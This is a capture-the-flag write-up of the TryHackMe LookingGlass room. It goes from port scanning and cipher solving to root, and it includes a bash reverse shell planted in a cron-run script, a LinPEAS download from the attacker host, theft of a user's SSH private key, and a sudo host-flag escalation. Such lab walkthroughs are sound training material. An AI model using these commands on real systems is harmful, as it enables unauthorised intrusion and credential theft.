TryHackMe — LookingGlass CTF Writeup
A step-by-step walkthrough of exploiting vulnerabilities and capturing the flags
Introduction
Capture The Flag (CTF) challenges have always been a playground for security enthusiasts, where every vulnerability and exploit is a puzzle waiting to be solved. In this write-up, I’ll take you on a journey through one such CTF challenge.
I’ll walk you through the tactics I used to break into the system, escalate privileges, and ultimately claim the flag. For those who prefer to solve things themselves, each exploitation step will be followed by an indication before the solution, so you can try to figure it out first!
Whether you’re new to CTFs or a seasoned pro, this post offers insights into the tools and mindset needed to succeed in the world of ethical hacking and penetration testing.
Reconnaissance
In the initial reconnaissance phase, we conducted a Nmap scan to gather information about the target system. We used the following command to scan the target IP address:
nmap -sV -T5 -O 10.10.127.42 -oN scan.txtOptions Breakdown :
- -sV: Service Version Detection.
- -T5: Set scan speed to the fastest setting (level 5).
- -O: Operating System Detection
- -oN: Output to File
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-31 06:34 EST
Nmap scan report for 10.10.127.42 (10.10.127.42)
Host is up (0.30s latency).
Not shown: 916 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9000/tcp open ssh Dropbear sshd (protocol 2.0)
9001/tcp open ssh Dropbear sshd (protocol 2.0)
9002/tcp open ssh Dropbear sshd (protocol 2.0)
9003/tcp open ssh Dropbear sshd (protocol 2.0)
9009/tcp open ssh Dropbear sshd (protocol 2.0)
9010/tcp open ssh Dropbear sshd (protocol 2.0)
9011/tcp open ssh Dropbear sshd (protocol 2.0)
9040/tcp open ssh Dropbear sshd (protocol 2.0)
9050/tcp open ssh Dropbear sshd (protocol 2.0)
9071/tcp open ssh Dropbear sshd (protocol 2.0)
9080/tcp open ssh Dropbear sshd (protocol 2.0)
9081/tcp open ssh Dropbear sshd (protocol 2.0)
9090/tcp open ssh Dropbear sshd (protocol 2.0)
9091/tcp open ssh Dropbear sshd (protocol 2.0)
9099/tcp open ssh Dropbear sshd (protocol 2.0)
9100/tcp open jetdirect?
9101/tcp open jetdirect?
9102/tcp open jetdirect?
9103/tcp open jetdirect?
9110/tcp open ssh Dropbear sshd (protocol 2.0)
9111/tcp open ssh Dropbear sshd (protocol 2.0)
9200/tcp open ssh Dropbear sshd (protocol 2.0)
9207/tcp open ssh Dropbear sshd (protocol 2.0)
9220/tcp open ssh Dropbear sshd (protocol 2.0)
9290/tcp open ssh Dropbear sshd (protocol 2.0)
9415/tcp open ssh Dropbear sshd (protocol 2.0)
9418/tcp open ssh Dropbear sshd (protocol 2.0)
9485/tcp open ssh Dropbear sshd (protocol 2.0)
9500/tcp open ssh Dropbear sshd (protocol 2.0)
9502/tcp open ssh Dropbear sshd (protocol 2.0)
9503/tcp open ssh Dropbear sshd (protocol 2.0)
9535/tcp open ssh Dropbear sshd (protocol 2.0)
9575/tcp open ssh Dropbear sshd (protocol 2.0)
9593/tcp open ssh Dropbear sshd (protocol 2.0)
9594/tcp open ssh Dropbear sshd (protocol 2.0)
9595/tcp open ssh Dropbear sshd (protocol 2.0)
9618/tcp open ssh Dropbear sshd (protocol 2.0)
9666/tcp open ssh Dropbear sshd (protocol 2.0)
9876/tcp open ssh Dropbear sshd (protocol 2.0)
9877/tcp open ssh Dropbear sshd (protocol 2.0)
9878/tcp open ssh Dropbear sshd (protocol 2.0)
9898/tcp open ssh Dropbear sshd (protocol 2.0)
9900/tcp open ssh Dropbear sshd (protocol 2.0)
9917/tcp open ssh Dropbear sshd (protocol 2.0)
9929/tcp open ssh Dropbear sshd (protocol 2.0)
9943/tcp open ssh Dropbear sshd (protocol 2.0)
9944/tcp open ssh Dropbear sshd (protocol 2.0)
9968/tcp open ssh Dropbear sshd (protocol 2.0)
9998/tcp open ssh Dropbear sshd (protocol 2.0)
9999/tcp open ssh Dropbear sshd (protocol 2.0)
10000/tcp open ssh Dropbear sshd (protocol 2.0)
10001/tcp open ssh Dropbear sshd (protocol 2.0)
10002/tcp open ssh Dropbear sshd (protocol 2.0)
10003/tcp open ssh Dropbear sshd (protocol 2.0)
10004/tcp open ssh Dropbear sshd (protocol 2.0)
10009/tcp open ssh Dropbear sshd (protocol 2.0)
10010/tcp open ssh Dropbear sshd (protocol 2.0)
10012/tcp open ssh Dropbear sshd (protocol 2.0)
10024/tcp open ssh Dropbear sshd (protocol 2.0)
10025/tcp open ssh Dropbear sshd (protocol 2.0)
10082/tcp open ssh Dropbear sshd (protocol 2.0)
10180/tcp open ssh Dropbear sshd (protocol 2.0)
10215/tcp open ssh Dropbear sshd (protocol 2.0)
10243/tcp open ssh Dropbear sshd (protocol 2.0)
10566/tcp open ssh Dropbear sshd (protocol 2.0)
10616/tcp open ssh Dropbear sshd (protocol 2.0)
10617/tcp open ssh Dropbear sshd (protocol 2.0)
10621/tcp open ssh Dropbear sshd (protocol 2.0)
10626/tcp open ssh Dropbear sshd (protocol 2.0)
10628/tcp open ssh Dropbear sshd (protocol 2.0)
10629/tcp open ssh Dropbear sshd (protocol 2.0)
10778/tcp open ssh Dropbear sshd (protocol 2.0)
11110/tcp open ssh Dropbear sshd (protocol 2.0)
11111/tcp open ssh Dropbear sshd (protocol 2.0)
11967/tcp open ssh Dropbear sshd (protocol 2.0)
12000/tcp open ssh Dropbear sshd (protocol 2.0)
12174/tcp open ssh Dropbear sshd (protocol 2.0)
12265/tcp open ssh Dropbear sshd (protocol 2.0)
12345/tcp open ssh Dropbear sshd (protocol 2.0)
13456/tcp open ssh Dropbear sshd (protocol 2.0)
13722/tcp open ssh Dropbear sshd (protocol 2.0)
13782/tcp open ssh Dropbear sshd (protocol 2.0)
13783/tcp open ssh Dropbear sshd (protocol 2.0)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.02 secondsFindings:
- The target is running a mix of OpenSSH and Dropbear SSH services across multiple ports, which is unusual and might indicate a honeypot or misconfiguration.
- OS detection suggests a Linux-based target, potentially running kernel versions between 2.6.32 and 4.9.
Enumeration
After gathering information about the open ports and services, we moved on to the enumeration phase to dig deeper into the discovered services.
Dropbear is a lightweight SSH server often used in embedded systems. To interact with it, we used dbclient, a Dropbear SSH client.
💡 Indication: Start by checking the Dropbear SSH ports. Focus on ports in the 9000–14000 range to see which one gives a distinct response that might indicate the real service.
We noticed that all ports between 9000 and 14000 were running Dropbear SSH. To find the correct port, we attempted connecting to port 9000 first using:
dbclient -p 9000 10.10.127.42The server responded with “lower”. Then, we tried:
dbclient -p 10000 10.10.127.42This time, the response was “higher”. Since the CTF challenge is named “Looking Glass”, we suspected that everything might be inverted, meaning “higher” actually meant “lower” and vice versa.
💡 Indication: Instead of testing every port, think about how you can use a binary search method to narrow down the correct port efficiently.
Applying the Binary Search Method (half-interval search)
Instead of brute-forcing each port one by one, we applied a more efficient approach: binary search (also known as half-interval search). The idea is to repeatedly divide the search range in half to quickly zero in on the correct port.
Steps:
1- Start with the lowest (9000) and highest (10000) known Dropbear ports.
2- Try the midpoint: (9000 + 10000) / 2 = 9500.
3- If the response is “higher,” search in the lower half: (9000 + 9500) / 2 = 9250.
4- If the response is “lower,” search in the upper half: (9500 + 10000) / 2 = 9750.
5- Continue halving the search range until the correct port is found.
Using this method, we quickly found the correct port: 9025.
Important Note: The correct port changes every time the machine is rebooted, so this process needs to be repeated if the target resets. I do recommend writing a script!
Accessing the Real Service
Upon successfully connecting to port 9025 (in our case), we received the following message:
You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.
'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'
Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.
Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!
Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.
'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'
Wl ciskvttk me apw jzn.
'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
Enter Secret:💡 Indication: Consider using an online decryption tool to experiment with different keys.
Deciphering the Message
The message appeared encrypted, so we attempted to identify the cipher. A quick online analysis revealed that it was encrypted using the Vigenère cipher.
Using an automatic decryption tool, we tested various potential keys. The correct key turned out to be “THEALPHABETCIPHER”.
At the end of the decrypted message, we found the secret phrase:
bewareTheJabberwockGaining Credentials
Entering the secret revealed a username and password:
jabberwock:BirthdaysBlanketsBlazingHuntedOnce again, note that both the correct Dropbear port and password change each time the machine is rebooted!
Exploitation
With valid credentials in hand, we connected to the real OpenSSH port (22):
Upon logging in, we retrieved the user flag from user.txt.
Lateral Movement
Inside the home directory, we discovered five users:
jabberwock(our current user)humptydumptyalicetweedledeetweedledum
Our assumption was that lateral movement across these users was required to gain root privileges.
To enumerate potential vectors, we uploaded LinPEAS, a well-known Linux enumeration script:
On our local machine, start a simple HTTP server:
python3 -m http.server 8000On the target machine, download LinPEAS:
wget http://10.10.14.1:8000/linpeas.shGrant execution permissions:
chmod +x linpeas.shRun LinPEAS:
./linpeas.shKey Discovery: LinPEAS output revealed an interesting cron job
This meant that on every system reboot, the script twasBrillig.sh was executed as the usertweedledum.
💡 Indication: Since the script runs automatically on reboot, consider whether you can modify it to execute arbitrary commands. Think about ways to persist acces
Checking Permissions
Since jabberwock could execute reboot as root:
sudo -lThe output showed:
(root) NOPASSWD: /sbin/rebootAdditionally, we confirmed that twasBrillig.sh was writable:
ls -la /home/jabberwock/twasBrillig.shExploitation Plan:
- Modify
twasBrillig.shto include a reverse shell payload. - Reboot the machine using
reboot. - Gain a shell as
tweedledum.
Reverse Shell Payload:
We modified twasBrillig.sh with:
#!/bin/bash
bash -i >& /dev/tcp/your_local_machine_ip/1234 0>&1On our local machine, we set up a listener:
nc -lvnp 1234Finally, we triggered the exploit:
sudo rebootThis successfully granted us access as tweedledum
Exploiting Tweedledum’s Environment
In the home directory of tweedledum, we found a hex-encoded file owned by root and the user humptydumpty.
Decoding this file revealed the final line:
The password is zyxwvutsrqponmlkHowever, instead of executing the su humptydumpty command directly from the netcat shell , we returned to our stable jabberwock user SSH shell.
Our latest system reboot had reset the password for jabberwock, meaning we had to re-identify the correct Dropbear SSH port (from the 9000–14000 range) to retrieve the updated jabberwock password.
As noted earlier, we recommend writing a script to automate the process of identifying the correct Dropbear SSH port, as it changes with every reboot. Once we retrieved the new jabberwock password using the script and re-established our stable SSH connection, we successfully ran:
su humptydumptyto switch to the humptydumpty account.
Moving from Humptydumpty to Alice
Further enumeration revealed that the humptydumpty account had some kind of access to alice’s home directory. In particular, we noted that the permissions on Alice’s directory were set to drwx--x--x.
drwx--x--x💡 Indication: Observe the directory permissions carefully. Even though you may not be able to read the files inside, consider what actions are still possible with execute-only access.
Given these permissions, the first action — as any experienced penetration tester would consider — was to inspect the contents of the directory. We proceeded to read the SSH private key by executing:
cat /home/alice/.ssh/id_rsaThis command successfully revealed the private key, allowing us FINALLY to authenticate as Alice without the need to interact with the frequently changing password of the jabberwock account.
After verifying the permissions, we adjusted the file mode to secure it on our local machine:
chmod 600 id_rsaThen, we used the private key to log into the account alice:
ssh alice@10.10.127.42 -i id_rsaEscalating to Root
Further enumeration with linpeas.sh revealed a critical finding in the sudoers configuration:
/etc/sudoers.d/alice is readable and contains:
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash💡 Indication: Pay close attention to the host specification in the sudo rule.
At first glance, it appears that the user alice can run /bin/bash as root without a password. However, the command includes a host specification ssalg-gnikool.
This means that Alice is permitted to run bash as root — but only when specifying the host argument correctly:
sudo -h ssalg-gnikool /bin/bashThis command successfully provides us with a root shell, allowing us to retrieve the root flag.
The LookingGlass CTF challenge demonstrated how a combination of reconnaissance, exploitation, and privilege escalation can lead to a full system compromise. By meticulously analyzing service configurations, exploiting user credentials, and leveraging nuances in file permissions and sudo configurations, we were able to navigate a complex multi-user environment and ultimately escalate privileges to root.
Keep hacking, keep learning!
